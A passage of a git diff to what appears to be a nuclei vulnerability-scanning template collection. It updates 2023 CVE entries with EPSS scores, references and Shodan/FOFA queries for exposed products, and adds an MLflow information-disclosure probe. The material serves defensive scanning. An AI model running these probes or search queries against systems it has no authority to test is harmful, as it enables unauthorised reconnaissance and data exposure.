+ - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" + product: opencms + vendor: alkacon + fofa-query: title="opencms" + google-query: intitle:"opencms" tags: cve,cve2023,xss,opencms http: @@ -32,4 +39,4 @@ http: - 'Apache Chemistry OpenCMIS' - '' condition: and -# digest: 490a00463044022076759a64ec8dcf9d061745db5d2542a5ac1e41ecbbed76ac48d4de5e23e38a57022046d2065515fddaff3bb682600a0e4500ffb0d8b44d539031bfd8fb89ea8cd091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec8cd697c46ef8ebf1f06b19f7a09d1bc6bfd5668d1c39e73eadd911b7ec813e0221008d5a832ae4403ba0ddc92701308747190c2df6d87eccc1551133709ef2ff3d8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 48301c8e50..c0dd88635e 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -12,20 +12,24 @@ info: - https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91 - https://nvd.nist.gov/vuln/detail/CVE-2023-42442 - https://github.com/jumpserver/jumpserver/commit/0a58bba59cd275bab8e0ae58bf4b359fbc5eb74a + - https://github.com/Marco-zcl/POC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-42442 cwe-id: CWE-287 - epss-score: 0.09144 - epss-percentile: 0.94063 + epss-score: 0.79196 + epss-percentile: 0.98277 cpe: cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fit2cloud product: jumpserver - fofa-query: title="JumpServer" + fofa-query: + - title="JumpServer" + - title="jumpserver" tags: cve2023,cve,jumpserver,exposure,fit2cloud http: @@ -51,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022056c740fc5645290237c9ed3d38594f1c08b5e60e15db07c695228b0949457784022100fb351a9723c5de4a59566e98322107608ec9657e3602c71dc050b9b375994aaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220233c29e3487047b77769a298603acef5fab3841e3a829681e9a1093c7df9253b02204bad4b923b7bb8b66d316855fcca625797d90afb68e0eb2578b1dcf58dd7b0cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 2a7e94274f..b9e2e56bdc 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -17,16 +17,22 @@ info: cvss-score: 9.8 cve-id: CVE-2023-42793 cwe-id: CWE-288 - epss-score: 0.97093 - epss-percentile: 0.99759 + epss-score: 0.97094 + epss-percentile: 0.99777 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: jetbrains product: teamcity - shodan-query: title:TeamCity - fofa-query: title=TeamCity + shodan-query: + - title:TeamCity + - http.title:teamcity + - http.component:"teamcity" + fofa-query: + - title=TeamCity + - title=teamcity + google-query: intitle:teamcity tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev http: @@ -73,4 +79,4 @@ http: regex: - 'value="(.*?)"' internal: true -# digest: 490a00463044022026f4c8ba9cd64942e6b47aeca1ae4c7a0428af0449dd14aef984e0d8c1c6e09302204256a4b88da06f8eee47c94cbde42e81ae16b511b6da5979bd88ea9761bae7f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9e13d07e6dc8ffc49d616435238b49c866fcee93e21da47209c28ae7de1e9ac022100d700d5b1d2ff0a8fd1bc3b56e389cbfd4f551ad143d281b6c9ed742eb020eb3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml index 4b7c96efa1..50e8d243c7 100644 --- a/http/cves/2023/CVE-2023-43177.yaml +++ b/http/cves/2023/CVE-2023-43177.yaml @@ -17,13 +17,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43177 cwe-id: CWE-913 - epss-score: 0.92767 - epss-percentile: 0.98966 + epss-score: 0.96402 + epss-percentile: 0.99567 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: crushftp product: crushftp + shodan-query: http.html:"crushftp" + fofa-query: body="crushftp" tags: cve,cve2023,crushftp,unauth,rce,intrusive flow: http(1) && http(2) && http(3) @@ -72,4 +74,4 @@ http: - status_code == 200 - contains(body, "crushadmin{{dirname}}") condition: and -# digest: 4a0a00473045022100830445e9bba00a117daddfca1259b9ef7a022d6fe27e13f9cb7b40949407bd9c02204a02f01f53e956fcc4b5e30944fd8a5bc1bb49d9f20ff4fb78329f46f5adf916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e013ea63ca1f07dde63ec297ffbbd1f37e560231c1396d3dd07debcc39e7a17502202b87f70d993704c3d894534a22f376c9b0e545474adef184c0f7ca697a37708b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43187.yaml b/http/cves/2023/CVE-2023-43187.yaml index b8a0294b5d..4720b4b23b 100644 --- a/http/cves/2023/CVE-2023-43187.yaml +++ b/http/cves/2023/CVE-2023-43187.yaml @@ -14,13 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43187 cwe-id: CWE-91 - epss-score: 0.09598 - epss-percentile: 0.94633 + epss-score: 0.2535 + epss-percentile: 0.96685 cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: nodebb product: nodebb + shodan-query: cpe:"cpe:2.3:a:nodebb:nodebb" fofa-query: "title=\"nodebb\"" tags: cve,cve2023,nodebb,rce flow: http(1) && http(2) @@ -66,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220201c4d48716a02d2c66be4a7318bc2ac1dc92830e14b1535590a9c46f12dd8b702207930b8b7e7e95cef77c5f136bcadcbbe6b1dff80070bdf6dad62f0623c96f6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f73e8bfe9f915a5f04e492f88298ddf9c08f2c4fba07b868c0fefcc55b5585e02205b4976d241ea3d57d596f3af37f9478a17a66b28bf536fe9d09ab098811bbb99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index b840e7cc68..89cb820a43 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -16,14 +16,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43208 - epss-score: 0.00349 - epss-percentile: 0.71422 + epss-score: 0.96306 + epss-percentile: 0.99539 cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: nextgen - product: mirth_connect - shodan-query: title:"mirth connect administrator" - tags: cve,cve2023,nextgen,rce + product: "mirth_connect" + shodan-query: + - "title:\"mirth connect administrator\"" + - http.title:"mirth connect administrator" + fofa-query: "title=\"mirth connect administrator\"" + google-query: "intitle:\"mirth connect administrator\"" + tags: packetstorm,cve,cve2023,nextgen,rce,kev http: - raw: @@ -104,4 +109,4 @@ http: regex: - '(.*)' internal: true -# digest: 4a0a0047304502206fe736214580619678b34e475a3c7fd97fa9c3bbd559bf1db7ac3d3724dd3832022100878eabed20ca61c94683b6daeb92fa1739f9893c5501986e8c77541479cd3adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220493bb6fcbb5b0e17a203c29515fb7d3e84813d5da8775cddf045269de8a6f97f02210084f1354002a9be79b69f4f76c3cba09bdc1c9110d7e8d0e99db5d1dbf1a37299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index 860d4d386e..59ff524e0e 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -17,14 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2023-43261 cwe-id: CWE-532 - epss-score: 0.00476 - epss-percentile: 0.73134 - cpe: cpe:2.3:o:milesight:ur5x_firmware:*:*:*:*:*:*:*:* + epss-score: 0.00565 + epss-percentile: 0.77715 + cpe: cpe:2.3:h:milesight:ur51:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: milesight - product: ur5x_firmware + product: ur51 shodan-query: http.html:rt_title tags: cve2023,cve,router,milesight,disclosure,unauth,iot @@ -39,4 +39,4 @@ http: - type: regex regex: - '"username":"([^"]+)","password":"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)"' -# digest: 4a0a0047304502207394fd4bf1e89bd3f82e011d999c60cb16f8e489eb83397b2cb5d1fd7643db0e022100d5913daa6cf013217df6a366ae32509ce0316d4ac4be68b7150926e99c883030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055b449c697f3cf7d0fd4bbb71d220dfd5d97c2a8f9f20272f94d63f3e24906b2022100c663ea58c5cf68bfa82ec127044032a57e3a96d96e988a7115490ec416211cd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 8cffbf64dc..2f903a2820 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -17,14 +17,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-43325 cwe-id: CWE-79 - epss-score: 0.37241 - epss-percentile: 0.97089 + epss-score: 0.18316 + epss-percentile: 0.96187 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: @@ -39,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a0047304502202e377871e2dcf45ea88526dd773225b7426c810ec8d964008e5ae7740b376bbd022100ee2a52abdc80ae957ebaddab106be03f26fd93e09e9f1290a10149d53d6aa2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6d31b975d49d517924b62d996e9139c8afb6b35784a456bd830be0c53d4906e02200cc68e9cba608c058b0ffac9e1e7f36534ab2efa005af111f87169ebc1b9bff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index ee7185587d..f5c0336200 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -16,14 +16,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-43326 cwe-id: CWE-79 - epss-score: 0.00643 - epss-percentile: 0.78809 + epss-score: 0.00666 + epss-percentile: 0.79657 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: @@ -38,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "", "mooSocial")' condition: and -# digest: 4a0a0047304502210094826e0df08385c1006098c627611803a7a886633321a9b354a9f46b3fe45475022022c5d44415b7bc83f55c50510556c7b4d13feb3317fb5e82ef3fc4fd9eaef1c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220310e54c3bfa2512ef8c5ed7a4a2f4404e38fac783268ba1c8e423271f4e6e74f02207a1dd30a82dadfd1dece2f3178c3eef779f0098c66d3f296198600563fa1b141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 1b20ba9e04..2c624e7f27 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -18,17 +18,23 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43374 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31944 + epss-score: 0.00735 + epss-percentile: 0.80777 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: digitaldruid product: hoteldruid - shodan-query: title:"HotelDruid" - fofa-query: title="HotelDruid" - tags: cve,cve2023,hoteldruid,cms,sqli - + shodan-query: + - title:"HotelDruid" + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="HotelDruid" + - title="hoteldruid" + - icon_hash=-1521640213 + google-query: intitle:"hoteldruid" + tags: cve,cve2023,hoteldruid,cms,sqli,digitaldruid flow: http(1) && http(2) http: @@ -61,4 +67,4 @@ http: - 'status_code == 200' - 'contains(body, "HotelDruid:")' condition: and -# digest: 4a0a00473045022100e833bee8477a7d35d428595751237754df5f6dcd346f312d7bd3b39aff1ce502022073b0e42e337aadd7c1cd77196e08e3ecada460c031dca3ecfd850b727521655f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ccd06c1d6b4afb0e01163a001a2c7cf4e28046454d7905bf5949f6076f999cf4022100acde6da1ea9ac5fc9dba22d88202661d83f7dc21e59d343a1868288df0b8b79b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43472.yaml b/http/cves/2023/CVE-2023-43472.yaml new file mode 100644 index 0000000000..b4193e2ff8 --- /dev/null +++ b/http/cves/2023/CVE-2023-43472.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-43472 + +info: + name: MLFlow < 2.8.1 - Sensitive Information Disclosure + author: ritikchaddha + severity: high + description: | + An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API. + impact: | + An attacker can access sensitive information stored in MLFlow. + remediation: | + Upgrade MLFlow to a version that has patched CVE-2023-43472. + reference: + - https://www.contrastsecurity.com/security-influencers/discovering-mlflow-framework-zero-day-vulnerability-machine-language-model-security-contrast-security + - https://nvd.nist.gov/vuln/detail/CVE-2023-43472 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-43472 + epss-score: 0.00116 + epss-percentile: 0.45309 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: lfprojects + product: mlflow + shodan-query: http.title:"mlflow" + fofa-query: app="MLflow" + tags: cve,cve2023,mflow,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/2.0/preview/mlflow/experiments/list" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "experiment_id\":", "artifact_location\":", "lifecycle_stage\":")' + - 'contains(header, "application/json")' + - 'status_code == 200' + condition: and +# digest: 490a0046304402200604a134f8c6077c7051b019211d1b92cdae8f79ac5b9be070e6c09a53bf039102207d6375965069071d12932be5b11b6762e2396f54e8cc8ce2a051da395a28499e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 08e6822031..04f449ba08 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -16,16 +16,22 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43795 cwe-id: CWE-918 - epss-score: 0.11649 - epss-percentile: 0.95151 + epss-score: 0.13101 + epss-percentile: 0.9552 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: osgeo product: geoserver - shodan-query: title:"GeoServer" - fofa-query: app="GeoServer" + shodan-query: + - title:"GeoServer" + - http.title:"geoserver" + fofa-query: + - app="GeoServer" + - app="geoserver" + - title="geoserver" + google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo variables: oast: "{{interactsh-url}}" @@ -80,4 +86,4 @@ http: - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}') - status_code == 200 condition: and -# digest: 4b0a0048304602210082f80177b7581f04212dc0576a4751ee20bdab22835edf2095f77a79c13757720221008fbe8e42bc297fe303de98bdf9b8426e646574e35cf00e0f6481f28a7b6e2bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203454d2f353de8b311b53f58885926aa14e79392ea0e4bf552c2653c214124ab9022070dc6c40140eb259e30e78f2a0c155725eabcf398c1a5f6ddbe6abf389ddc712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 46398ab734..c5d526d415 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -11,18 +11,20 @@ info: - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic - https://vuldb.com/?ctiid.237518 - https://vuldb.com/?id.237518 + - https://github.com/thedarknessdied/Ruijie_RG-EW1200G_login_bypass-CVE-2023-4415 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4415 cwe-id: CWE-287 - epss-score: 0.00355 - epss-percentile: 0.69044 + epss-score: 0.00593 + epss-percentile: 0.78272 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijienetworks product: rg-ew1200g_firmware + shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve2023,cve,ruijie,router,ruijienetworks @@ -55,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4a0364d29e6d0e864db602feaaae08fc127111b3fec57f533478cf3e87a10ca022100bbcf82e6d3554f4b048f608fede70c8cd68e70453354e55f9644a720664e29d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020896244e031d49e7315d5d7a04a1b190d61e9cb650d793b5043f1e715c994aa022100885c3f96f29b282e9f9657adafc6131cd3570d5aaad3a00ac6cf86145d578db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index efacc220cb..704174d31b 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -22,7 +22,15 @@ info: max-request: 8 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe Coldfusion" + shodan-query: + - http.component:"Adobe Coldfusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,coldfusion,adobe,xss variables: string: "{{rand_base(8)}}" @@ -54,4 +62,4 @@ http: - "contains(body, 'ColdFusion')" - "contains(header, 'text/html')" condition: and -# digest: 4b0a004830460221008fbb590bc361593981c4b4ca8788ce40ec113fa6cb5f66d0494289924511b5a50221008b3fce96d336a94a73797aaec994cc638d7b228ab77ab19cc9a08f89a1d4b9fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce96a082d0f000c92096a33e4c6682786c68f87204e8a007899a3aef0e64e524022051ee6b38721b584430ceea3db1394145a5708f8e91860151f52b4146a67b6992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index 5a92691943..2717f46c1f 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -12,22 +12,31 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-44353 - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py + - https://github.com/JC175/CVE-2023-44353-Nuclei-Template + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-44353 cwe-id: CWE-502 - epss-score: 0.00456 - epss-percentile: 0.72579 + epss-score: 0.00412 + epss-percentile: 0.73869 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,deserialization,xss - variables: windows_known_path: "C:\\Windows\\" windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\" @@ -79,4 +88,4 @@ http: - "status_code_3 == 500 && status_code_4 == 404" - contains(body_3, "coldfusion.runtime") condition: and -# digest: 4a0a004730450220047bd272fa85a31954610677163c6d46bc1bc7e4cbe15197f0a08be5f0919fcf022100a0fbfd66e5f0e75667e67d3994d5f3fda3fa376e5401a3eee32f69955eb0e4e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022016552548b902a20941bf3b8f74c6bb4168571b335e98fde72738a6b91f4bf39f02200c0098761471880e51ff1a9325790c071def7853d7c548302d5bb84f5178d7ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 5250b902bf..98cabf32a9 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -17,15 +17,21 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4451 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.2616 + epss-score: 0.00157 + epss-percentile: 0.52015 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: agentejo product: cockpit - shodan-query: html:"Cockpit" + shodan-query: + - html:"Cockpit" + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve2023,cve,huntr,cockpit,xss,agentejo http: @@ -48,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fbe7607e0757fba526338e3de141fc45574561029d8df0e67ec0661ed4fa9ff802201f80e83613cd2bdbb2fb20e60560b066dc1c68da990157d9f6c49c9613db4636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063f28e329fc2092a3ffb840691830535abec15df1b086cadcf68c926b1d785f80221009b65b4daf1a07dfb75b36a8bd44f086cb9a9129fa3e77a5c6251f7e4cc975886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 6f93166dc3..7303570ecf 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -19,15 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-44812 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28937 + epss-score: 0.01077 + epss-percentile: 0.84242 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: moosocial product: moosocial - fofa-query: icon_hash="702863115" + shodan-query: "http.favicon.hash:\"702863115\"" + fofa-query: "icon_hash=\"702863115\"" tags: cve2023,cve,moosocial,xss - flow: http(1) && http(2) http: @@ -57,4 +58,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "")' condition: and -# digest: 4b0a00483046022100f555f0259ec83f340fb6efe6252abd7b67f304c538fe2d4bb5a46d4a3e7d209e022100f7db3b06b1e97e43235ec12bfd7dc548956be134f2728dc384fc52e4ed35af51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c60899a35754aaebff402853bedc6911e8558773043efb7ee2e8d542c607472d022100e088c6417867562abfd43d9c71877efe4797481beb6bdeebc3b4fb457c1bcc80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index e8a8a086ed..a14327d08d 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -13,20 +13,24 @@ info: reference: - https://github.com/ahrixia/CVE-2023-44813 - https://nvd.nist.gov/vuln/detail/CVE-2023-44813 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-44813 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28937 + epss-score: 0.01077 + epss-percentile: 0.84242 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial - shodan-query: http.favicon.hash:702863115 + shodan-query: + - http.favicon.hash:702863115 + - http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve,cve2023,moosocial,xss http: @@ -49,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acfa09d8753734777ae264a34a2301092b20f0e9752d3c46a2c1cd62a768413a02204a56fbddcb961f4ecc0a6a20bde95cc3eaef3f8e5f60254eec300b6c960addbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201cdf99ca13ad865d44f6f19a8bf72b8b90211fd7771f01947c1559cfdeeb3b22022100a652cd0d4992c880a8e81df6e3e701e2d42e4d16f61058ece78137c5d3ebab6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index fbbaafe62a..acf4230b7a 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -15,16 +15,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4521 - epss-score: 0.00156 - epss-percentile: 0.51418 + epss-score: 0.03055 + epss-percentile: 0.90979 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:* metadata: + max-request: 2 vendor: mooveagency - product: import_xml_and_rss_feeds + product: "import_xml_and_rss_feeds" framework: wordpress - fofa-query: body="import-xml-feed" - tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce - + shodan-query: "http.html:\"import-xml-feed\"" + fofa-query: "body=\"import-xml-feed\"" + tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency flow: http(1) && http(2) http: @@ -48,4 +49,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a00463044022002d89f2b86a35aa84fbf049f2e5074005a9225a3532e05d405dcb474452f7dd10220583d87dc17b3e9d079f09e3e12275e8e07965a6f325121265f93559902e6cd3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a36f31ac5e2649a9bca8782a9c836439dc0c1707ed49b1d6dfb3320fbcef834d0220716dd0d57089d321834e7d979a7281d444a6e13b73d59902030b2237564cb4f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 49fad0f912..f6df7c98a8 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -13,18 +13,17 @@ info: cvss-score: 8.8 cve-id: CVE-2023-45375 cwe-id: CWE-89 - epss-score: 0.0005 - epss-percentile: 0.17639 + epss-score: 0.01204 + epss-percentile: 0.8517 cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:* metadata: - max-request: 1 verified: true + max-request: 2 vendor: 01generator product: pireospay framework: prestashop - shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,pireospay - + shodan-query: "http.component:\"prestashop\"" + tags: cve,cve2023,sqli,prestashop,pireospay,01generator flow: http(1) && http(2) http: @@ -57,4 +56,4 @@ http: - status_code == 302 - contains(content_type, "text/html") condition: and -# digest: 